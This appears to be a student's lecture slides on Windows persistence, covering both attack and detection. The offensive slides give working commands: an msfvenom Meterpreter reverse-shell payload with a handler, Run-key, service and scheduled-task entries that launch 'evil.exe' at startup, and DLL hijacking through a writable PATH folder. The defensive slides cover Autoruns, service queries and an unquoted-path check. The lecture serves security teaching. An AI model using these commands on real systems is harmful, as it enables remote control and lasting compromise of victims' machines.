The document covers techniques for achieving and detecting persistence on Windows systems, particularly in the context of cybersecurity. It details methods for using Windows registry keys, services, scheduled tasks, and DLL hijacking to ensure malicious programs run at startup. Additionally, it provides commands for creating autoruns and detecting existing persistence mechanisms.

1. Gaining and detecting
Windows Persistence
Prepared by:
Levytskyi Oleg
Student ZI-41
Security Analyst

2. WARNING
The materials of the lecture are presented only for
EDUCATIONAL PURPOSES.
The speaker is not responsible for the use of this
information for illegal purposes

3. root@kali:~# msfvenom -a x86 --platform Windows -p
windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f
exe -o evill.exe
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.2 //(your ip)
msf > set LPORT 4444 //(your port)
msf > exploit
Creating payload

4. Typical Attack. V1
Hm.
smth go
wrong
I want to
reboot
system
Destination host unreachable
run exploit
cmd shell>_
Connection Lost

5. Attack. V2
Hm.
smth go
wrong
I want to
reboot
system
run exploit
cmd shell>_
HKLMSoftwareMicrosoftWindowsCurrentVersionRun
Connection Lost
System is starting
cmd shell>_

6. So, what is persistence?
What kind of persistence do
you know?
Is it really a huge problem?

7. Persistence causes programs to run each time that a
user logs on or system starts. Usually in background.
“Hackers use persistence, not zero days to breach
companies”

8. Registry autoruns
Run/RunOnce Keys
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion Run
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion RunOnce
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Run
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion RunOnce
● HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPolicies
Keys used by WinLogon Process
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion Winlogon
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon Shell
Startup Keys
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer User Shell
Folders
● HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer Shell Folders
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer Shell Folders
● HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer User
…

9. Create autorun
cmd> reg add “HKLMSOFTWARE
MicrosoftWindowsCurrentVersionRun”
/f /V "My" /t REG_SZ
/D "C:...evil.exe"
OR
PS> Set-ItemProperty "HKLM:Software
MicrosoftWindowsCurrentVersionRun"
-Name “My” -Value "C:...evil.exe"
… and reboot;)

10. But sometimes life becomes harder

11. And when the best one gives up

12. For the help comes...

13. Autorun. How to detect?
Link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
This utility, which has the most
comprehensive knowledge of auto-starting
locations of any startup monitor, shows you
what programs are configured to run during
system bootup or login.

14. Services

15. Create new service
cmd> sc create My binpath="C:...evil.exe" type=own start=auto
OR
PS> New-Service -Name "My" -BinaryPathName "C:...evil.exe" -DisplayName "My"
-StartupType Automatic

16. Сhange service path
Registry Path: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices

17. Services. How to look at them?
powershell command:
PS> Get-Service
PS> Get-WmiObject
Win32_Service

18. Services. Real-world situation

19. Unquoted service path
C:PROGRAM FILESSUB DIRPROGRAM NAME
C:PROGRAM*FILESSUB*DIRPROGRAM*NAME
● c:program.exe filessub dirprogram name
● c:program filessub.exe dirprogram name
● c:program filessub dirprogram.exe name

20. Unquoted service path. How to detect?
cmd>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows" |findstr /i /v """

21. Unquoted service path. How to resolve?

22. Schedule tasks V1 (at). How?
cmd> at 08:00
/EVERY:m,t,w,th,f,s,su
"C:...evil.exe"
(ALWAYS SYSTEM priv)
C:Windowssystem32> at /?
The AT command schedules commands and
programs to run on a computer at
a specified time and date. The
Schedule service must be running to
use
the AT command.
AT [computername] [ [id] [/DELETE] |
/DELETE [/YES]]
AT [computername] time
[/INTERACTIVE]
[ /EVERY:date[,...] |
/NEXT:date[,...]] "command"

23. Schedule tasks V2
cmd> SchTasks /Create /SC DAILY
/TN “My” /TR "C:...evil.exe" /ST
17:00

24. Schedule tasks. How to detect?
cmd> schtasks /query /FO CSV
/v > schtasks.csv

25. DLL hijacking and PATH magic
Dynamic-link library (or DLL) is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating
systems.
With both implicit and explicit linking, Windows first searches for "known DLLs", such as Kernel32.dll and User32.dll. Windows then
searches for the DLLs in the following sequence:
1. The directory where the executable module for the current process is located.
2. The current directory.
3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory.
4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory.
5. The directories listed in the PATH environment variable.
...Do you know your PATH?

26. DLL hijacking and PATH magic
PS C:UsersleoDesktop> echo $env:PATH
C:Windowssystem32;C:Windows;C:WindowsSystem32Wbem;C:WindowsSystem32
WindowsPowerShellv1.0;C:Program FilesOpenVPNbin; C:Python27
PS C:UsersleoDesktop> (Get-ACL C:Python27).Access
NT AUTHORITYAuthenticated Users FullAccess
PS C:UsersleoDesktop> cp wlbsctrl.dll C:Python27

27. Shortcut hijacking

28. Check in form
Link: https://goo.gl/forms/HxB915h8NDm83VGj1

29. Thank you for listening!